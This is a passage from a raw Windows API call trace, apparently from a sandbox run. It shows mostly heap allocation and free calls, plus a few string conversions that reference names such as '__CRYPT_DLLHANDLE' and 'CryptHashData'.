Flags=0x0, Size=0x8) returned 0x2e55028 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.468] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0240.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.511] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0240.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0240.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0240.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", 